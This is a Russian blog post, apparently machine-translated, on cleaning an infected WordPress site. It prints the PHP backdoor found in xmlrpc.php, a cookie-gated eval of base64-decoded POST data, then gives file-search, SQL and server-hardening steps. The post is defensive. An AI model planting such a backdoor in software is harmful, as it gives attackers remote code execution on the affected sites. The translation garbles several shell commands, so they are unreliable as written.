WordPress Эксплойт - Очистите вирусные файлы, SQL и безопасность сервера.

Прежде, чем Вы читаете это сообщение, вы должны увидеть разместить здесь, Чтобы что-то понять. :)

Я нашел его в нескольких файлах блога на stealthsettings.com, коды, подобные приведенным ниже, которые появились в результате заражения вирусом подвиг WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

XMLRPCЕсли она выше файл xmlrpc.php от СонныйНо в GREP сервер, вы можете видеть, что есть довольно много такого рода в исходном коде.

pppffiuuu

Лечение зараженных файлов:

Ooookkkk ...
1. Лучшее решение, после того, как было резервная копияИ очищать базу данных, чтобы вытирать Файлы WordPress (вы можете сохранить wp-config.php и файлы, которые не имеют прямого отношения к платформе wp, после их тщательной проверки) с сервера и загрузить оригинальные из версии 2.5.1 (В течение этого сделать WP обновления версии :)) http://wordpress.org/download/ . Протрите включая файлы темы, если вы не уверены, что их тщательной проверки.

Кажется, были затронуты и файлы темы, которые не были использованы, прежде чем на блоге и просто меняя тему, не решает проблемы.

./андреа/wp-контент/темы/default/index.php:

2. Поиск и удаление всех файлов, содержащих: * _new.php, _old.php *, * Jpgg, Giff *, * Pngg и файл WP-info.txt, если таковые имеются....

найти. -name «* _new.php»
найти. -name «* _old.php»
найти. -name «* .jpgg»
найти. -name «* _giff»
найти. -name «* _pngg»
найти. -name «wp-info.txt»

3. в / Tmp , Поиск и удаление папок, как tmpYwbzT2

SQL очистки :

1. В таблице Таблица wp_options Смотрите, если есть удалите строки: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Все в wp_options, идти к active_plugins и удалять, если есть плагин, который заканчивается в одном из расширений * _new.php, _old.php *, *. jpgg, *. Гифф, *. pngg или если другое расширение подозреваемых, тщательно проверить.

3. В Таблице wp_users, Смотрите, если есть пользователь, который ничего не написал в своем праве, колонка user_nicename. Удалите этого пользователя, но запомните номер в столбце ID. Этот пользователь, скорее всего, будет использовать "WordPress”Ка user_login и, кажется, созданных на 00: 00: 00 0000-00-00.

4. Перейти к таблице wp_usermeta и удалить все линии, принадлежащие ID выше.

После того, как вы выполнили эту очистку sql, отключите, а затем активируйте любой плагин. (в блоге -> Личный кабинет -> Плагины)

Безопасный сервер:

1. Посмотрите, что каталоги и файлы "записи»(chmod 777) и попробуйте поставить chmod что больше не позволит их писать на любом уровне. (chmod 644, например)

Найти. -Пермь-2-LS

2. Посмотрите, что файлы имеют бит SUID или SGID . Если вы не используете эти файлы положить на них chmod 0 или удалить пакет, который она содержит. Очень опасны, потому что они выполняют привилегии "группы"Или"корень"И не с нормальными пользовательскими привилегиями для выполнения этого файла.

Найти / типа F-Пермь-04000-LS
Найти / типа F-Пермь-02000-LS

3. Проверьте, какие порты открыты и попытаться закрыть или защитить тех, которые не используются.

NetStat-| Grep-я слушаю

О его. Понимаю Некоторые блоги запрещены de Google Search а другие говорят: "Он сделал их хорошо!!!" . Ну, я бы сделал это за них... но что вы скажете, если Google начнет банить Все сайты формирование  Является спамом и положить трояны (Trojan.Clicker.HTML) в куки?

Поклонник технологий, с 2006 года с удовольствием пишу на StealthSettings.com. Обширный опыт работы с операционными системами: macOS, Windows и Linux, а также с языками программирования и платформами для блогов (WordPress) и онлайн-магазинов (WooCommerce, Magento, PrestaShop).

КАК » Антивирус и безопасность » WordPress Эксплойт - Очистите вирусные файлы, SQL и безопасность сервера.

1 мысль о "WordPress Эксплойт — Очистить вирусные файлы, SQL и безопасность сервера».

Оставьте комментарий